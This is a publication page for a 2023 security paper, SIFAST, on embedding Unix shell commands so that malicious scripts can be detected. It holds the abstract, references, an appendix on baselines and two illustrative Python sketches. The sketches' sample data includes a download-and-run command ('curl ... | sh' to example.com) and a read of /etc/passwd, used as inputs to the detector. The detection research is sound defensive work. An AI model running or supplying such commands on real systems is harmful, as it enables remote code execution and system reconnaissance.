SIFAST: An Efficient Unix Shell Embedding Framework for Malicious Detection

Chen, Songyue; Yang, Rong; Zhang, Hong; Wu, Hongwei; Zheng, Yanqin; Fu, Xingyu; Liu, Qingyun

doi:10.1007/978-3-031-49187-0_4

Songyue Chen (ORCID: orcid.org/0009-0009-1969-1167), Rong Yang, Hong Zhang, Hongwei Wu, Yanqin Zheng, Xingyu Fu & Qingyun Liu

Part of the book series: Lecture Notes in Computer Science (LNCS, volume 14411)

Included in the following conference series:

International Conference on Information Security

Abstract

The Unix Shell is a powerful tool for system developers and engineers, but it poses serious security risks when cybercriminals use it to execute malicious scripts. These scripts can compromise servers, steal confidential data, or cause system crashes. Detecting and preventing malicious scripts is therefore an important task for intrusion detection systems. In this paper, we propose a novel framework, called SIFAST, for embedding and detecting malicious Unix Shell scripts. Our framework combines Smooth Inverse Frequency (SIF) and Abstract Syntax Tree (AST) techniques to rapidly convert Unix Shell commands and scripts into vectors that capture their semantic and syntactic features. These vectors can then be fed to various downstream machine learning models for classification or anomaly detection. In comparisons with other embedding methods across multiple downstream detection models, we demonstrate that SIFAST significantly improves both accuracy and efficiency. We also provide a labeled dataset of normal and abnormal Unix commands and scripts, collected from various open-source data. We hope to make a humble contribution to the field of intrusion detection systems by offering a solution for identifying malicious scripts in the Unix Shell.
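
To illustrate the SIF half of the framework, the sketch below applies generic Smooth Inverse Frequency sentence embedding (frequency-based token weights, a weighted average of token vectors, and removal of the dominant common direction) to already tokenized commands. It is a minimal sketch and not the authors' implementation: the toy three-dimensional token vectors, the smoothing constant `a`, the example commands, and all function names are assumptions made for illustration, and the AST-based part of SIFAST is not covered.

```python
import math
from collections import Counter

def sif_weights(corpus_tokens, a=1e-3):
    """Weight each token by a / (a + p(token)); frequent tokens get small weights."""
    counts = Counter(tok for toks in corpus_tokens for tok in toks)
    total = sum(counts.values())
    return {tok: a / (a + c / total) for tok, c in counts.items()}

def weighted_average(tokens, vectors, weights, dim):
    """SIF-weighted mean of the vectors of the tokens that have an embedding."""
    known = [t for t in tokens if t in vectors]
    acc = [0.0] * dim
    for t in known:
        w = weights.get(t, 1.0)
        for i, x in enumerate(vectors[t]):
            acc[i] += w * x
    n = len(known) or 1
    return [x / n for x in acc]

def first_direction(rows, iters=100):
    """Approximate the top right singular vector of `rows` by power iteration."""
    dim = len(rows[0])
    u = [1.0 / math.sqrt(dim)] * dim
    for _ in range(iters):
        proj = [sum(r[i] * u[i] for i in range(dim)) for r in rows]
        v = [sum(p * r[i] for p, r in zip(proj, rows)) for i in range(dim)]
        norm = math.sqrt(sum(x * x for x in v))
        if norm == 0.0:
            break
        u = [x / norm for x in v]
    return u

def remove_direction(rows, u):
    """Subtract from every row its projection onto the unit vector u."""
    cleaned = []
    for r in rows:
        p = sum(x * y for x, y in zip(r, u))
        cleaned.append([x - p * y for x, y in zip(r, u)])
    return cleaned

# Hypothetical tokenized commands and toy token embeddings (illustration only).
corpus = [["ls", "-la"], ["cat", "/etc/passwd"], ["ls", "/tmp"]]
vectors = {
    "ls": [1.0, 0.0, 0.5],
    "-la": [0.2, 0.1, 0.0],
    "cat": [0.0, 1.0, 0.5],
    "/etc/passwd": [0.1, 0.9, 0.3],
    "/tmp": [0.3, 0.2, 0.1],
}

weights = sif_weights(corpus)
rows = [weighted_average(toks, vectors, weights, 3) for toks in corpus]
direction = first_direction(rows)
embeddings = remove_direction(rows, direction)
```

In this sketch `embeddings` holds one vector per command; in practice the token vectors would come from a trained word-embedding model rather than a hand-written table.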

References

Different linux Commands and Utilities Commonly Used by Attackers. https://www.uptycs.com/blog/linux-commands-and-utilities-commonly-used-by-attackers
Evasive techniques used by malicious shell scripts on different unix systems. https://www.uptycs.com/blog/evasive-techniques-used-by-malicious-linux-shell-scripts
LOLBAS. https://lolbas-project.github.io/
Tree-sitter Using Parsers. https://tree-sitter.github.io/tree-sitter/using-parsers
What Is a Reverse Shell | Examples & Prevention Techniques | Imperva
GTFOBins (2022). https://gtfobins.github.io/
Living Off the Land: How to Defend Against Malicious Use of Legitimate Utilities (2022). https://threatpost.com/living-off-the-land-malicious-use-legitimate-utilities/177762/
Al-Janabi, M., Altamimi, A.M.: A comparative analysis of machine learning techniques for classification and detection of Malware. In: 2020 21st International Arab Conference on Information Technology (ACIT), pp. 1–9 (2020). https://doi.org/10.1109/ACIT50332.2020.9300081
Alahmadi, A., Alkhraan, N., BinSaeedan, W.: MPSAutodetect: a malicious powershell script detection model based on stacked denoising auto-encoder. Comput. Secur. 116, 102658 (2022). https://doi.org/10.1016/j.cose.2022.102658
Andrew, Y., Lim, C., Budiarto, E.: Mapping Linux shell commands to MITRE ATT&CK using NLP-based approach. In: 2022 International Conference on Electrical Engineering and Informatics (ICELTICs), pp. 37–42 (2022). https://doi.org/10.1109/ICELTICs56128.2022.9932097
Boffa, M., Milan, G., Vassio, L., Drago, I., Mellia, M., Ben Houidi, Z.: Towards NLP-based processing of honeypot logs. In: 2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), pp. 314–321 (2022). https://doi.org/10.1109/EuroSPW55150.2022.00038
Bohannon, D., Holmes, L.: Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science (2017)
Bojanowski, P., Grave, E., Joulin, A., Mikolov, T.: Enriching Word Vectors with Subword Information (2017)
Chai, H., Ying, L., Duan, H., Zha, D.: Invoke-Deobfuscation: AST-based and semantics-preserving deobfuscation for powershell scripts. In: 2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), pp. 295–306 (2022). https://doi.org/10.1109/DSN53405.2022.00039
Elmasry, W., Akbulut, A., Zaim, A.H.: Deep learning approaches for predictive masquerade detection. Secur. Commun. Netw. 2018, e9327215 (2018). https://doi.org/10.1155/2018/9327215
Fang, Y., Huang, C., Zeng, M., Zhao, Z., Huang, C.: JStrong: malicious JavaScript detection based on code semantic representation and graph neural network. Comput. Secur. 118, 102715 (2022). https://doi.org/10.1016/j.cose.2022.102715
Fang, Y., Zhou, X., Huang, C.: Effective method for detecting malicious PowerShell scripts based on hybrid features. Neurocomputing 448, 30–39 (2021). https://doi.org/10.1016/j.neucom.2021.03.117
Feng, Z., et al.: CodeBERT: a pre-trained model for programming and natural languages (2020). https://doi.org/10.48550/arXiv.2002.08155
Gao, T., Yao, X., Chen, D.: SimCSE: simple contrastive learning of sentence embeddings. In: Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing, pp. 6894–6910. Association for Computational Linguistics, Online and Punta Cana, Dominican Republic (2021). https://doi.org/10.18653/v1/2021.emnlp-main.552
Goudie, M.: The Rise of “Living off the Land” Attacks | CrowdStrike (2019). https://www.crowdstrike.com/blog/going-beyond-malware-the-rise-of-living-off-the-land-attacks/
Hendler, D., Kels, S., Rubin, A.: Detecting malicious powershell commands using deep neural networks. In: Proceedings of the 2018 on Asia Conference on Computer and Communications Security, pp. 187–197. ASIACCS ’18, Association for Computing Machinery, New York, NY, USA (2018). https://doi.org/10.1145/3196494.3196511
Hendler, D., Kels, S., Rubin, A.: AMSI-based detection of malicious powershell code using contextual embeddings. In: Proceedings of the 15th ACM Asia Conference on Computer and Communications Security, pp. 679–693. ASIA CCS ’20, Association for Computing Machinery, New York, NY, USA (2020). https://doi.org/10.1145/3320269.3384742
Hussain, Z., Nurminen, J., Mikkonen, T., Kowiel, M.: Command Similarity Measurement Using NLP (2021). https://doi.org/10.4230/OASIcs.SLATE.2021.13
Kidwai, A., et al.: A comparative study on shells in Linux: a review. Mater. Today Proc. 37, 2612–2616 (2021). https://doi.org/10.1016/j.matpr.2020.08.508
Le, Q., Mikolov, T.: Distributed representations of sentences and documents. In: Proceedings of the 31st International Conference on Machine Learning, vol. 32, pp. II-1188–II-1196. ICML’14, JMLR.org, Beijing, China (2014)
Lin, X.V., Wang, C., Zettlemoyer, L., Ernst, M.D.: NL2Bash: a corpus and semantic parser for natural language interface to the Linux operating system (2018). arXiv:1802.08979 [cs]
Liu, C., et al.: Code execution with pre-trained language models (2023). https://doi.org/10.48550/arXiv.2305.05383
Liu, W., Mao, Y., Ci, L., Zhang, F.: A new approach of user-level intrusion detection with command sequence-to-sequence model. J. Intell. Fuzzy Syst. 38(5), 5707–5716 (2020). https://doi.org/10.3233/JIFS-179659
Mikolov, T., Chen, K., Corrado, G., Dean, J.: Efficient estimation of word representations in vector space (2013). arXiv:1301.3781 [cs]
Mimura, M., Tajiri, Y.: Static detection of malicious PowerShell based on word embeddings. Internet Things 15, 100404 (2021). https://doi.org/10.1016/j.iot.2021.100404
Ongun, T., et al.: Living-off-the-land command detection using active learning. In: Proceedings of the 24th International Symposium on Research in Attacks, Intrusions and Defenses, pp. 442–455. RAID ’21, Association for Computing Machinery, New York, NY, USA (2021). https://doi.org/10.1145/3471621.3471858
Peng, H., Mou, L., Li, G., Liu, Y., Zhang, L., Jin, Z.: Building program vector representations for deep learning. In: Zhang, S., Wirsing, M., Zhang, Z. (eds.) KSEM 2015. LNCS (LNAI), vol. 9403, pp. 547–553. Springer, Cham (2015). https://doi.org/10.1007/978-3-319-25159-2_49
Rathore, H., Agarwal, S., Sahay, S.K., Sewak, M.: Malware detection using machine learning and deep learning. In: Mondal, A., Gupta, H., Srivastava, J., Reddy, P.K., Somayajulu, D.V.L.N. (eds.) BDA 2018. LNCS, vol. 11297, pp. 402–411. Springer, Cham (2018). https://doi.org/10.1007/978-3-030-04780-1_28
Rebootuser: LinEnum (2023)
Rousseau, A.: Hijacking .NET to Defend PowerShell (2017). https://doi.org/10.48550/arXiv.1709.07508
Song, J., Kim, J., Choi, S., Kim, J., Kim, I.: Evaluations of AI-based malicious PowerShell detection with feature optimizations. ETRI J. 43(3), 549–560 (2021). https://doi.org/10.4218/etrij.2020-0215
Swissky: Payloads All The Things (2023)
Trizna, D.: Shell language processing: Unix command parsing for machine learning (2021). arXiv:2107.02438 [cs]
Tsai, M.H., Lin, C.C., He, Z.G., Yang, W.C., Lei, C.L.: PowerDP: de-obfuscating and profiling malicious PowerShell commands with multi-label classifiers. IEEE Access 11, 256–270 (2023). https://doi.org/10.1109/ACCESS.2022.3232505
Zhai, H., et al.: Masquerade detection based on temporal convolutional network. In: 2022 IEEE 25th International Conference on Computer Supported Cooperative Work in Design (CSCWD), pp. 305–310 (2022). https://doi.org/10.1109/CSCWD54268.2022.9776088

Acknowledgements

This work is supported by the Strategic Priority Research Program of the Chinese Academy of Sciences (Grant No. XDC02030400) and the Scaling Program of the Institute of Information Engineering, CAS (Grant Nos. E3Z0041101 and E3Z0191101).

Author information

Authors and Affiliations

Institute of Information Engineering, Chinese Academy of Sciences, Beijing, China
Songyue Chen, Rong Yang, Hongwei Wu, Xingyu Fu & Qingyun Liu
School of Cyber Security, University of Chinese Academy of Sciences, Beijing, China
Songyue Chen, Rong Yang, Hongwei Wu, Xingyu Fu & Qingyun Liu
National Engineering Laboratory of Information Security Technologies, Beijing, China
Songyue Chen, Rong Yang, Hongwei Wu, Xingyu Fu & Qingyun Liu
National Computer network Emergency Response technical Team/Coordination Center of China, Beijing, China
Hong Zhang
Chinatelecom Cloud, Beijing, China
Yanqin Zheng

Corresponding author

Correspondence to Rong Yang.

Editor information

Editors and Affiliations

University of Cyprus, Nicosia, Cyprus
Elias Athanasopoulos
Radboud University, Nijmegen, The Netherlands
Bart Mennink

Appendix

TF-IDF. This is the most basic sentence-vector generation method in natural language processing, and it is also the sentence embedding method used by Trizna et al. It first computes a TF-IDF weight for each word in a sentence and then combines the per-word weights into a TF-IDF representation of the whole sentence.
Doc2Vec [25]. This method learns a sentence vector jointly with the vectors of the words in the sentence, so the sentence vector is produced directly by training. It is similar to Word2Vec, but extends it by adding sentence vectors to the joint training.
MPSAutodetect [9]. This is a deep learning framework for detecting malicious PowerShell scripts. It uses a character-based embedding, feeds the embedding into a denoising autoencoder to extract features, and finally passes those features to a classifier.
SimCSE [19]. An advanced pretrained sentence embedding model based on contrastive learning. We employ the unsupervised variant of SimCSE to learn code representations for shell scripts. Although SimCSE requires powerful hardware, which makes it impractical to embed in Unix systems, we still include it as a baseline to illustrate the gap between our model and conventional deep learning models.
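
The TF-IDF baseline described above can be sketched in a few lines. The example below is a minimal illustration and not the code used in the paper or by Trizna et al.: the whitespace tokenizer, the smoothed IDF formula, the example commands, and all function names are assumptions. Each command becomes a vocabulary-sized vector whose entries are the TF-IDF weights of its tokens.

```python
import math
from collections import Counter

def tokenize(command):
    # Naive whitespace split (assumption); a shell-aware tokenizer would do better.
    return command.split()

def fit_idf(corpus):
    """Smoothed inverse document frequency for every token seen in the corpus."""
    n_docs = len(corpus)
    doc_freq = Counter()
    for command in corpus:
        doc_freq.update(set(tokenize(command)))
    return {tok: math.log((1 + n_docs) / (1 + df)) + 1.0
            for tok, df in doc_freq.items()}

def tfidf_vector(command, idf, vocab):
    """Vocabulary-sized vector; each entry is term frequency times IDF."""
    counts = Counter(tokenize(command))
    total = sum(counts.values()) or 1
    return [counts[tok] / total * idf[tok] for tok in vocab]

# Hypothetical example commands (illustration only).
corpus = [
    "ls -la /tmp",
    "cat /etc/passwd",
    "curl http://example.com/x.sh | sh",
]
idf = fit_idf(corpus)
vocab = sorted(idf)
vec = tfidf_vector("cat /etc/passwd", idf, vocab)
```

The resulting vector is sparse and as long as the vocabulary, which is one reason dense embeddings are usually preferred for large command corpora.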

Cite this paper

Chen, S. et al. (2023). SIFAST: An Efficient Unix Shell Embedding Framework for Malicious Detection. In: Athanasopoulos, E., Mennink, B. (eds) Information Security. ISC 2023. Lecture Notes in Computer Science, vol 14411. Springer, Cham. https://doi.org/10.1007/978-3-031-49187-0_4

DOI: https://doi.org/10.1007/978-3-031-49187-0_4
Published: 01 December 2023
Publisher Name: Springer, Cham
Print ISBN: 978-3-031-49186-3
Online ISBN: 978-3-031-49187-0
eBook Packages: Computer Science, Computer Science (R0)
